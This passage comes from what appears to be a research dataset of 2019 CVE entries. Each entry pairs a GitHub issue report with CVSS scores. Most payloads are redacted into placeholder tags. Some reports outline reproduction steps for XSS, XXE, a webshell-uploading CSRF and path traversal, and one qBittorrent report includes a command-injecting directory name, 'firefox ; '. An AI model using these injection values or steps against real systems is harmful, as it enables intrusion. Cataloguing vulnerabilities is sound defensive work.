        "description": "Websocket hijacking vulnerability. CORS headers are only works in XHR requests, and ignored by clients during a websocket connection. Ref: FILETAG ERRORTAG TLDR; ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13618",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1250",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1250",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-06-04T08:09:07Z",
        "description": "heap buffer overflow in gf_m2ts_sync. hello\uff0cI found a heap buffer overflow bug in gpac. bug details URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13623",
        "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/789",
        "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/789",
        "Repo_new": "nationalsecurityagency/ghidra",
        "Issue_Created_At": "2019-07-14T15:31:57Z",
        "description": "Arbitrary code execution through loading a malicious project. Describe the bug A path traversal vulnerability exists in APITAG from package APITAG This vulnerability allows attackers to overwrite arbitrary files in the system. To achieve arbitrary code execution, one of the solutions is to overwrite some critical ghidra modules, e.g., decompile module (In this case we need to know the installation path of ghidra). To Reproduce NUMBERTAG Load the malicious project NUMBERTAG malicious code will be executed when the decompile module is called. Expected behavior Here is a demo of the attack behavior. URLTAG url Environment (please complete the following information): OS: All systems Ghidra Version: until NUMBERTAG Remark The vulnerability was found by researchers from GTISC MENTIONTAG Tech.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13625",
        "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/71",
        "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/71",
        "Repo_new": "nationalsecurityagency/ghidra",
        "Issue_Created_At": "2019-03-06T21:20:30Z",
        "description": "Project handling is susceptible to XXE. Describe the bug Project open/restore is susceptible to XML External Entity Expansion attacks. This can be exploited in various ways by getting someone to open/restore a project prepared by attacker. To Reproduce Steps to reproduce the behavior NUMBERTAG Create a project, and close it NUMBERTAG Put an XXE payload in any of the XML files in the project directory (see screenshot for example NUMBERTAG Open the project NUMBERTAG Observe your payload doing its thing. The same concept works with archived projects (.gar files) too. Expected behavior The XML parser should ignore external entities. For bonus points, it should give an error/warning when they are present. Screenshots The following screenshot was made of a proof of concept that only issues an HTTP GET request to localhost. Ghidra XXE APITAG URLTAG Environment (please complete the following information): OS: Kali Linux Rolling JDK Version: APITAG NUMBERTAG APITAG Debian NUMBERTAG Ghidra Version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13640",
        "Issue_Url_old": "https://github.com/qbittorrent/qBittorrent/issues/10925",
        "Issue_Url_new": "https://github.com/qbittorrent/qbittorrent/issues/10925",
        "Repo_new": "qbittorrent/qbittorrent",
        "Issue_Created_At": "2019-07-15T00:04:58Z",
        "description": "FILETAG . Also UTF NUMBERTAG Steps to reproduce NUMBERTAG Configure APITAG to run an external script in Preferences Downloads. Anything is valid. You can even quote the arguments. For example: APITAG NUMBERTAG Create a new torrent with the following command: APITAG To test it locally with already created content, without needing to upload your torrent to a public tracker, create a directory named APITAG firefox ; \"' (without the first and last quotes) that has the same values as the previous command's APITAG This will re hash the content and mark it as completed, executing the script. You can use midnight commander to do this NUMBERTAG When the torrent download finishes, Firefox is opened Greetings",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13643",
        "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1349",
        "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1349",
        "Repo_new": "espocrm/espocrm",
        "Issue_Created_At": "2019-07-12T13:10:20Z",
        "description": "Stored XSS in Stream messages APITAG NUMBERTAG Description Current version of APITAG NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in Stream messages. Malicious attacker can create specially crafted link, which contains javascript code and assign it to any user in the system. After the link is clicked malicious javascript code will be executed in user browser. APITAG Make the following request (insert your authentication data and hostname) CODETAG Then open the notifications and click the link. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13644",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2335",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2335",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-07-15T14:27:10Z",
        "description": "Stored XSS in budget name. Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in budget name. Malicious attacker can create specially crafted link, which contains javascript code and assign it to budget name. User who add transactions with malicious budget, can view page with that transaction on tag summary page ( URLTAG malicious javascript code will be executed. Steps to reproduce I create a small video for reproduce steps FILETAG APITAG CODETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-13645",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2337",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2337",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-07-16T11:57:57Z",
        "description": "Stored XSS in filename. Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in file names. Malicious attacker can upload specially crafted image, which contains javascript code in its name. Malicious javascript code will be executed when user edit this attachment ( URLTAG But this file can be created only on Linux or you can edit field name in local proxy (e.g. Burp Suite) If you want to edit request you should change this part of request, mainly filename part ERRORTAG Request ERRORTAG Steps to reproduce NUMBERTAG Download attached zip file and extract image (but it works only on Linux 'cause of characters in filename NUMBERTAG Create new or update exist transaction and upload file NUMBERTAG After uploaded attachment go to attachment page and click to edit this file APITAG image APITAG Image for testing FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-13646",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2339",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2339",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-07-16T11:58:01Z",
        "description": "Reflected XSS in search query. Description Current version of Firefly III Version NUMBERTAG is vulnerable to reflected XSS due to lack of filtration of user supplied data in search query. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user open this link. This can be easely reproduced in Mozilla Firefox and if you want to reproduce it in Chrome you should first turn off XSS auditor in IT Request http:// insert your host here APITAG APITAG image APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-13647",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2338",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2338",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-07-16T11:57:58Z",
        "description": "Stored XSS in file content. Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in files content. Malicious attacker can upload specially crafted image, which contains javascript code. Malicious javascript code will be executed when user view this attachment ( URLTAG Steps to reproduce NUMBERTAG Download attached zip file and extract svg image or create svg file with contains from bottom NUMBERTAG Create new or update exist transaction and upload svgfile.svg NUMBERTAG After uploaded attachment click on filename APITAG image APITAG Image for testing FILETAG Content of svgfile.svg CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-13951",
        "Issue_Url_old": "https://github.com/gdnsd/gdnsd/issues/185",
        "Issue_Url_new": "https://github.com/gdnsd/gdnsd/issues/185",
        "Repo_new": "gdnsd/gdnsd",
        "Issue_Created_At": "2019-07-18T13:16:22Z",
        "description": "Multiple stack based buffer overflow. Hi, I found two occurences of stack based buffer overflow when fuzzing gdnsd with American Fuzzy Lop NUMBERTAG The first occurence happens in the APITAG function, in zscan_rfc NUMBERTAG rl, and can be triggered with the following input: APITAG The issue can be be reproduced by creating a 'zones' directory, putting the above input in a file within the 'zones' directory, and running: APITAG Because no bounds checking is being done in the APITAG function, 'len' ends up being larger than NUMBERTAG ERRORTAG It seems your parser is attempting to parse malformed IP NUMBERTAG addresses until there is no input left, as I have been able to get 'len' to reach very large values when generating malformed IP NUMBERTAG address strings spawning several gigabytes, which gdnsd will happily attempt to parse NUMBERTAG The second occurence happens in the APITAG function, in zscan_rfc NUMBERTAG rl, and can be triggered with the following input: APITAG Because no bounds checking is being done in the APITAG function, 'len' ends up being larger than INET6_ADDRSTRLEN NUMBERTAG ERRORTAG As previously, the parser will happily parse malformed IP NUMBERTAG address strings spawning several gigabytes.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13959",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/394",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/394",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-05-14T06:23:56Z",
        "description": "Null Pointer Dereference(npd) Bug. Hi, recently when I experience the new version of bento4. I find an NPD bug in program \"mp NUMBERTAG aac\". The bug logic is that when the data size is not large enough and apply reallocation, the reallocation does not check whether the new buffer is successfully allocated. This is the execution trace. FILETAG In APITAG the function realloc buffer when new size is larger then current one. This means the two values of two size variable are not zero. FILETAG In reallocation, there is no null pointer check for the return value of the allocation and leads to the crash when apply APITAG which is an alias of memcpy function. I have uploaded the report and related bug trace to help understand this problem. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13960",
        "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/337",
        "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/337",
        "Repo_new": "libjpeg-turbo/libjpeg-turbo",
        "Issue_Created_At": "2019-02-27T12:18:55Z",
        "description": "Potential memory leak bug. Recently, I use my fuzzer to check the project and find a memory leak or potential overflow problem. This is the version: APITAG This is the input: FILETAG You can use ./djpeg file to reproduce the memory leak. APITAG This is the result with gdb.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13961",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/39",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/39",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2019-05-26T14:41:54Z",
        "description": "Bug Report: CSRF Vulnerability in FILETAG on APITAG Title: CSRF Vulnerability in FILETAG on APITAG Date NUMBERTAG May NUMBERTAG Discovered by: MENTIONTAG from ABT Labs Security: high (will cause the webshell to upload) Software: FILETAG Code: FILETAG There is no csrf check, only have a administrator APITAG there is no check on the file type, and did not change the uploaded file name) FILETAG Description: Using Cross Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. Exploit: We assume that APITAG is installed at URLTAG Our target is PATHTAG which is the page used to upload a new file. The given POC will upload a webshell to the website which has full administrator privileges. APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Before visit the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The webshell have been uploaded. Screenshots: First, administrator login. FILETAG Then, administrator visit the malicious webpage. FILETAG Attacker visit webshell. FILETAG Suggest: Check CSRF tokens in all POST request.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13970",
        "Issue_Url_old": "https://github.com/AntSwordProject/antSword/issues/151",
        "Issue_Url_new": "https://github.com/antswordproject/antsword/issues/151",
        "Repo_new": "antswordproject/antsword",
        "Issue_Created_At": "2019-04-18T10:37:47Z",
        "description": "APITAG self XSS Vulnerability leads to RCE. APITAG APITAG APITAG APITAG ERRORTAG APITAG \u5f00\u542fnc NUMBERTAG shell APITAG \u6216\u8005\u4f60\u53ea\u60f3\u5f39\u4e2a\u7a97\u4e5f\u884c APITAG self xss\u4e5f\u8bf7\u4fee\u590d\u4e00\u4e0b :D",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13979",
        "Issue_Url_old": "https://github.com/directus/api/issues/979",
        "Issue_Url_new": "https://github.com/directus/v8-archive/issues/979",
        "Repo_new": "directus/v8-archive",
        "Issue_Created_At": "2019-05-28T17:04:12Z",
        "description": "FILETAG It was also possible to see that every user has a direct access to the uploaded file: FILETAG And FILETAG Once, an attacker knows which type of shell he needs the next step is uploading web shell itself: FILETAG It is possible to see that an attacker is able to run commands on the backend server itself, thus can completely compromise the server. What problem does this feature solve? Fixes security hole. How do you think this should be implemented? The uploaded file types must be restricted only to the necessary file types and be validated on the server side. Uploaded directory should not have any execute permission and all the script handlers should be removed from these directories. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13981",
        "Issue_Url_old": "https://github.com/directus/api/issues/986",
        "Issue_Url_new": "https://github.com/directus/v8-archive/issues/986",
        "Repo_new": "directus/v8-archive",
        "Issue_Created_At": "2019-05-28T21:05:53Z",
        "description": "FILETAG What problem does this feature solve? Fixes security hole. How do you think this should be implemented? Do not let users to get access to upload files that were uploaded by another users. Image ID should be chosen by unpredictable way and one time random token should be appended to the link in order to prevent exact link guessing. Implement an authorization mechanism that validate if user authorized to view or download the specific file. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13981",
        "Issue_Url_old": "https://github.com/directus/api/issues/987",
        "Issue_Url_new": "https://github.com/directus/v8-archive/issues/987",
        "Repo_new": "directus/v8-archive",
        "Issue_Created_At": "2019-05-28T21:40:03Z",
        "description": "FILETAG What problem does this feature solve? Fixes security hole. How do you think this should be implemented? As a general rule, system components should not be accessible to unauthenticated users (excluding the authentication component, which is unique, as unauthenticated access to it is a functional requirement). The authentication enforcement mechanism should be thoroughly and comprehensively implemented in the system. The authentication validation should be performed as the first validation in each access to the system. The accessing entity should be obligated to authenticate with the system as a pre condition to use the system\u2019s services. After a successful authentication process, the user server side session storage should be \"populated\" with the permissions of authorized actions. It is recommended to use authentication enforcement mechanisms that operate globally (effectively affecting all components), instead of implementing authentication validation within each separate component. Authentication validation implementation through applicative filters or infrastructure authentication declarations is highly recommended, since it is less likely to be prone to authentication flaws resulting from human error. Furthermore, these mechanisms are easier to manage and are usually well tested and widely used. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13983",
        "Issue_Url_old": "https://github.com/directus/api/issues/991",
        "Issue_Url_new": "https://github.com/directus/v8-archive/issues/991",
        "Repo_new": "directus/v8-archive",
        "Issue_Created_At": "2019-05-30T11:03:57Z",
        "description": "[SECURITY] Insufficient Anti Automation \u2013 Brute Force Attack. Feature Request About audited Directus version. It has been cloned from suite repo. Latest commit URLTAG Description: Insufficient Anti automation occurs when a web application permits an attacker to automate a process that was originally designed to be performed only in a manual fashion, i.e. by a human web user. Business risk: Once exploited, attackers can use an automatic tool or a simple script that performs a brute force authentication attempts, and possible cause a legitimate user lock out. Technical details: The login mechanism of the application does not prevent a brute force on login attempts and on change password function. What problem does this feature solve? Fixes security hole. How do you think this should be implemented? Implement an anti automation mechanism such as CAPTCHA Note: do not use account locking, because of the ability to perform a APITAG on user accounts. Complementary instructions for protecting brute forcing on users can be found in the following URL: URLTAG URLTAG Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13990",
        "Issue_Url_old": "https://github.com/quartz-scheduler/quartz/issues/467",
        "Issue_Url_new": "https://github.com/quartz-scheduler/quartz/issues/467",
        "Repo_new": "quartz-scheduler/quartz",
        "Issue_Created_At": "2019-07-22T06:36:17Z",
        "description": "Security: XXE in APITAG The method APITAG in the APITAG does not forbid DTDs, which allows a context dependend attacker to perfom an XXE URLTAG . I reported this issue to the MITRE cooperation already which assigned the identifier CVETAG to this vulnerability. The OWASP Foundation provides an FILETAG that explains in detail the steps to prevent this security issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14241",
        "Issue_Url_old": "https://github.com/haproxy/haproxy/issues/181",
        "Issue_Url_new": "https://github.com/haproxy/haproxy/issues/181",
        "Repo_new": "haproxy/haproxy",
        "Issue_Created_At": "2019-07-22T10:19:51Z",
        "description": "Haproxy NUMBERTAG stuck thread. APITAG Output of APITAG and ERRORTAG ERRORTAG What's the configuration? APITAG Thread NUMBERTAG act NUMBERTAG glob NUMBERTAG wq NUMBERTAG rq NUMBERTAG tl NUMBERTAG tlsz NUMBERTAG rqsz NUMBERTAG haproxy NUMBERTAG stuck NUMBERTAG fdcache NUMBERTAG prof NUMBERTAG harmless NUMBERTAG wantrd NUMBERTAG haproxy NUMBERTAG cpu_ns: poll NUMBERTAG now NUMBERTAG diff NUMBERTAG haproxy NUMBERTAG curr_task NUMBERTAG e NUMBERTAG ce6b0 (task) calls NUMBERTAG last NUMBERTAG haproxy NUMBERTAG fct NUMBERTAG e NUMBERTAG a NUMBERTAG process_stream) ct NUMBERTAG e NUMBERTAG haproxy NUMBERTAG strm NUMBERTAG e NUMBERTAG APITAG fe=standaardsite APITAG dst=unknown haproxy NUMBERTAG rqf NUMBERTAG rqa NUMBERTAG rpf NUMBERTAG rpa NUMBERTAG sif=EST NUMBERTAG sib=INI NUMBERTAG haproxy NUMBERTAG af=(nil NUMBERTAG csf NUMBERTAG e NUMBERTAG b NUMBERTAG haproxy NUMBERTAG ab=(nil NUMBERTAG csb=(nil NUMBERTAG haproxy NUMBERTAG APITAG haproxy NUMBERTAG APITAG haproxy NUMBERTAG ALERT NUMBERTAG Current worker NUMBERTAG exited with code NUMBERTAG APITAG haproxy NUMBERTAG ALERT NUMBERTAG exit on failure: killing every processes with SIGTERM haproxy NUMBERTAG WARNING NUMBERTAG All workers exited. Exiting NUMBERTAG systemd NUMBERTAG APITAG Main process exited, code=exited, PATHTAG systemd NUMBERTAG APITAG Failed with result 'exit code'. systemd NUMBERTAG APITAG Service hold off time over, scheduling restart. systemd NUMBERTAG APITAG Scheduled restart job, restart counter is at NUMBERTAG On our fallback APITAG instances (running NUMBERTAG and earlier) we have not seen this behaviour.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14243",
        "Issue_Url_old": "https://github.com/mastercactapus/caddy-proxyprotocol/issues/8",
        "Issue_Url_new": "https://github.com/mastercactapus/caddy-proxyprotocol/issues/8",
        "Repo_new": "mastercactapus/caddy-proxyprotocol",
        "Issue_Created_At": "2019-07-22T18:27:29Z",
        "description": "Denial of service vulnerability with invalid NUMBERTAG PROXY data. I opened an issue describing a APITAG vulnerability in the APITAG package used by this plugin: URLTAG This code is the only consumer of the package I was able to find with light googling/github searching. Since fixing the APITAG parsing bug will require an updated version of this plugin I wanted to file an issue here as well so it doesn't fall through the cracks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14243",
        "Issue_Url_old": "https://github.com/mastercactapus/proxyprotocol/issues/1",
        "Issue_Url_new": "https://github.com/mastercactapus/proxyprotocol/issues/1",
        "Repo_new": "mastercactapus/proxyprotocol",
        "Issue_Created_At": "2019-07-22T18:25:46Z",
        "description": "Invalid NUMBERTAG PROXY data causes parsing panics/denial of service. :wave: hi MENTIONTAG I was looking into the APITAG NUMBERTAG PROXY protocol and found your package. Unfortunately I found a class of crasher bugs when the library is presented malformed input. The APITAG 's APITAG function doesn't validate that the length of the buffered data is large enough to ensure that the slicing done to extract src/dest IP addresses (and ports where applicable) won't be out of bounds. Here's a small reproduction program: ERRORTAG The inline comment shows where the panic occurs. You can change the panic location by switching the APITAG byte to one of the other supported APITAG values in the parsing switch statement URLTAG . All supported APITAG 's are affected by this class of bug. Notably this results in a trivial denial of service attack against upstream consumers of this package. I was able to reproduce this crash with your caddy proxyprotocol URLTAG plugin, Caddy NUMBERTAG and the following Caddy file: APITAG Here's the output from the Caddy server after receiving the payload from the reproduction above: ERRORTAG I think its likely worth treating this as a denial of service vulnerability and releasing a new version of both this library and the upstream APITAG plugin with a note indicating users should upgrade. As an additional note because of when this panic occurs there is no audit trail in the configured APITAG and it brings down the entire webserver, not just the Go routine handling the request. Unfortunately I don't have the cycles to develop a fix for this bug. I'm not a Caddy user or a APITAG user, just a curious dev.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14268",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5739",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5739",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-07-25T01:42:06Z",
        "description": "Placeholder. Relates to: APITAG NUMBERTAG Full details to come shortly. Prerequisites ] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [ ] I have written a descriptive issue title [ ] I have linked the original source of this report [ ] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description APITAG Affected versions APITAG Octopus Server: Mitigation APITAG Workarounds APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14271",
        "Issue_Url_old": "https://github.com/moby/moby/issues/39449",
        "Issue_Url_new": "https://github.com/moby/moby/issues/39449",
        "Repo_new": "moby/moby",
        "Issue_Created_At": "2019-07-01T23:53:44Z",
        "description": "docker cp broken with debian containers (arm). Description docker cp is broken with Debian containers (on armhf). Steps to reproduce the issue NUMBERTAG install the latest docker NUMBERTAG on armhf NUMBERTAG APITAG NUMBERTAG APITAG Describe the results you received: ERRORTAG Describe the results you expected: Work. Additional information you deem important (e.g. issue happens only occasionally): This works fine with: Alpine (musl) APITAG This also works fine with Debian on D4M using NUMBERTAG RC2 Output of docker version : ERRORTAG Output of docker info : ERRORTAG Additional environment details (AWS, APITAG physical, etc.): raspberry pi Either this is limited to armhf, or this is only in RC3 and not in RC2. MENTIONTAG also hinted at: URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14281",
        "Issue_Url_old": "https://github.com/rubygems/rubygems.org/issues/2072",
        "Issue_Url_new": "https://github.com/rubygems/rubygems.org/issues/2072",
        "Repo_new": "rubygems/rubygems.org",
        "Issue_Created_At": "2019-07-23T21:52:37Z",
        "description": "datagrid version NUMBERTAG is compromised and a malware, please yank!. Hi, datagrid version NUMBERTAG is compromised and a malware. Please remove it! The attack is similar to the recently reported bootstrap sass malware! FILETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14282",
        "Issue_Url_old": "https://github.com/rubygems/rubygems.org/issues/2073",
        "Issue_Url_new": "https://github.com/rubygems/rubygems.org/issues/2073",
        "Repo_new": "rubygems/rubygems.org",
        "Issue_Created_At": "2019-07-23T21:54:36Z",
        "description": "simple_captcha2 version NUMBERTAG is compromised and a malware, please yank!. Hi, simple_captcha2 version NUMBERTAG is compromised and a malware. Please remove it! The attack is similar to the recently reported bootstrap sass malware! It leaves a backdoor on the affected server. FILETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14295",
        "Issue_Url_old": "https://github.com/upx/upx/issues/286",
        "Issue_Url_new": "https://github.com/upx/upx/issues/286",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2019-07-19T06:15:54Z",
        "description": "Integer overflow in function APITAG at APITAG APITAG What's the problem (or question)? upx.out l APITAG /dev/null An issue was discovered in up NUMBERTAG There is a/an Integer overflow in function APITAG at APITAG In the add operation, the result of (p >sh_size + p >sh_offset) is equal to zero because of overflow. So the execution can pass the condition check on line NUMBERTAG and applicate excessive memory line NUMBERTAG resulting in denial of service. What should have happened? list compressed file Do you have an idea for a solution? check for integer overflow correctly How can we reproduce the issue? upx.out l APITAG /dev/null the poc is attached source ERRORTAG debug ERRORTAG bug report ERRORTAG Please tell us details about your environment. UPX version used ( APITAG ): Host Operating System and version: ubuntu NUMBERTAG Host CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz Target Operating System and version: ubuntu NUMBERTAG Target CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
